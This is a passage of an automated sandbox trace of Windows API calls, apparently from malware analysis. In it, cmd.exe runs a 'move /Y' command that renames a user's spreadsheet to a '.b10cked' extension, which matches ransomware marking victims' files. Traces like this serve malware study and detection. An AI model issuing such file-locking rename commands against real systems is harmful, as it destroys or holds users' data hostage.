AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.078] GetConsoleOutputCP () returned 0x1b5 [0132.078] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.078] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.078] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.078] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.078] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.078] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.079] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.079] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.079] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0132.079] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.079] GetEnvironmentStringsW () returned 0x270150* [0132.079] FreeEnvironmentStringsW (penv=0x270150) returned 1 [0132.079] GetEnvironmentStringsW () returned 0x270150* [0132.079] FreeEnvironmentStringsW (penv=0x270150) returned 1 [0132.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aee64 | out: phkResult=0x1aee64*=0x40) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x78, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x0, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.079] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] 
RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegCloseKey (hKey=0x40) returned 0x0 [0132.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aee64 | out: phkResult=0x1aee64*=0x40) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x40, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x1, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x0, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x9, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x4, lpData=0x1aee70*=0x9, lpcbData=0x1aee68*=0x4) returned 0x0 [0132.080] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x1aee6c, lpData=0x1aee70, lpcbData=0x1aee68*=0x1000 | out: lpType=0x1aee6c*=0x0, lpData=0x1aee70*=0x9, lpcbData=0x1aee68*=0x1000) returned 0x2 [0132.080] RegCloseKey (hKey=0x40) returned 0x0 [0132.080] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886366 [0132.080] srand (_Seed=0x5b886366) [0132.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"" [0132.080] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"" [0132.080] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.080] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2718b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0132.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.081] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.081] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0132.081] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0132.081] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0132.081] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0132.081] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0132.081] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0132.081] _wcsicmp 
(_String1="PROMPT", _String2="RANDOM") returned -2 [0132.081] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0132.081] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0132.081] GetEnvironmentStringsW () returned 0x2722a0* [0132.081] FreeEnvironmentStringsW (penv=0x2722a0) returned 1 [0132.081] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.081] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.081] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.081] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.081] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.082] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.082] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.082] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.082] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.082] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.082] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1afc30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.082] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1afc30, lpFilePart=0x1afc2c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1afc2c*="Desktop") returned 0x18 [0132.082] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.082] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af9ac | out: lpFindFileData=0x1af9ac) returned 0x26ffe0 [0132.082] FindClose (in: hFindFile=0x26ffe0 | out: hFindFile=0x26ffe0) returned 1 [0132.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af9ac | out: 
lpFindFileData=0x1af9ac) returned 0x26ffe0 [0132.082] FindClose (in: hFindFile=0x26ffe0 | out: hFindFile=0x26ffe0) returned 1 [0132.082] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af9ac | out: lpFindFileData=0x1af9ac) returned 0x26ffe0 [0132.083] FindClose (in: hFindFile=0x26ffe0 | out: hFindFile=0x26ffe0) returned 1 [0132.083] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0132.083] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0132.083] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0132.083] GetEnvironmentStringsW () returned 0x272ac0* [0132.083] FreeEnvironmentStringsW (penv=0x272ac0) returned 1 [0132.083] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.083] GetConsoleOutputCP () returned 0x1b5 [0132.083] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.083] GetUserDefaultLCID () returned 0x409 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1afd70, cchData=128 | out: lpLCData="0") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1afd70, cchData=128 | out: lpLCData="0") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1afd70, cchData=128 | out: lpLCData="1") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: 
lpLCData="Tue") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0132.084] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0132.084] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.085] GetConsoleTitleW (in: lpConsoleTitle=0x2608c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.085] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.085] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0132.085] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0132.085] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0132.086] _wcsicmp (_String1="move", _String2=")") returned 68 [0132.086] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0132.086] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0132.086] _wcsicmp (_String1="IF", _String2="move") returned -4 [0132.086] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0132.086] _wcsicmp (_String1="REM", _String2="move") returned 5 [0132.086] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0132.088] GetConsoleTitleW (in: 
lpConsoleTitle=0x1afa68, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.088] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0132.088] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0132.088] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0132.088] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0132.088] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0132.088] _wcsicmp (_String1="move", _String2="CD") returned 10 [0132.088] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0132.089] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="REN") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0132.089] _wcsicmp (_String1="move", _String2="SET") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0132.089] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0132.089] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0132.089] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0132.089] _wcsicmp (_String1="move", _String2="MD") returned 11 [0132.089] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0132.089] _wcsicmp (_String1="move", _String2="RD") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0132.089] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0132.089] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0132.089] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0132.089] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0132.089] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0132.089] _wcsicmp (_String1="move", _String2="VER") returned -9 [0132.089] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0132.089] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0132.089] _wcsicmp 
(_String1="move", _String2="SETLOCAL") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0132.089] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0132.089] _wcsicmp (_String1="move", _String2="START") returned -6 [0132.089] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0132.089] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0132.089] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0132.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.090] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0132.090] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af824, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af81c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0132.091] _wcsnicmp 
(_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.091] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.092] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", 
_String2=".") returned 63 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2="..") returned 63 [0132.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\muum~1.xls")) returned 0x20 [0132.092] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0132.092] SetErrorMode (uMode=0x0) returned 0x0 [0132.092] SetErrorMode (uMode=0x1) returned 0x0 [0132.092] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", nBufferLength=0x104, lpBuffer=0x1af1ac, lpFilePart=0x1af194 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", lpFilePart=0x1af194*="MUUM~1.XLS") returned 0x24 [0132.092] SetErrorMode (uMode=0x0) returned 0x1 [0132.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2=".") returned 63 [0132.092] _wcsicmp (_String1="MUUM~1.XLS", _String2="..") returned 63 [0132.092] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS" (normalized: "c:\\users\\eebsym5\\docume~1\\muum~1.xls")) returned 0x20 [0132.093] SetErrorMode (uMode=0x0) returned 0x0 [0132.093] SetErrorMode (uMode=0x1) returned 0x0 [0132.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", nBufferLength=0x104, lpBuffer=0x1af628, lpFilePart=0x1af3c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", lpFilePart=0x1af3c0*="MUUM~1.XLS") returned 0x24 [0132.093] SetErrorMode (uMode=0x0) returned 0x1 [0132.093] SetErrorMode (uMode=0x0) returned 0x0 [0132.093] SetErrorMode (uMode=0x1) returned 0x0 [0132.093] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1af830, lpFilePart=0x1af3c0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", lpFilePart=0x1af3c0*="Muum.xlsx.b10cked") 
returned 0x2b [0132.093] SetErrorMode (uMode=0x0) returned 0x1 [0132.093] SetLastError (dwErrCode=0x0) [0132.093] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx.b10cked")) returned 0xffffffff [0132.093] GetLastError () returned 0x2 [0132.093] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x1aed3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aed3c) returned 0x260eb8 [0132.093] FindNextFileW (in: hFindFile=0x260eb8, lpFindFileData=0x1aed3c | out: lpFindFileData=0x1aed3c) returned 0 [0132.094] GetLastError () returned 0x12 [0132.094] FindClose (in: hFindFile=0x260eb8 | out: hFindFile=0x260eb8) returned 1 [0132.094] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS", fInfoLevelId=0x1, lpFindFileData=0x271ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271ac8) returned 0x260eb8 [0132.094] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", nBufferLength=0x104, lpBuffer=0x1aefd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked", lpFilePart=0x0) returned 0x2b [0132.095] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx", nBufferLength=0x104, lpBuffer=0x1aefd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx", lpFilePart=0x0) returned 0x23 [0132.095] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx")) returned 0x20 [0132.095] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\muum.xlsx.b10cked"), dwFlags=0x3) returned 1 [0132.095] FindClose (in: 
hFindFile=0x260eb8 | out: hFindFile=0x260eb8) returned 1 [0132.095] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1aef88 | out: _Buffer=" 1") returned 9 [0132.095] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.095] GetFileType (hFile=0x7) returned 0x2 [0132.095] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0132.095] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1aef14 | out: lpMode=0x1aef14) returned 1 [0132.096] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1aef48 | out: lpConsoleScreenBufferInfo=0x1aef48) returned 1 [0132.096] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0132.096] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aef88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0132.096] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1aef6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aef6c*=0x1a) returned 1 [0132.226] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.226] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.227] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.227] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.227] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.227] SetConsoleInputExeNameW () returned 0x1 [0132.227] GetConsoleOutputCP () returned 0x1b5 [0132.227] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.227] SetThreadUILanguage (LangId=0x0) 
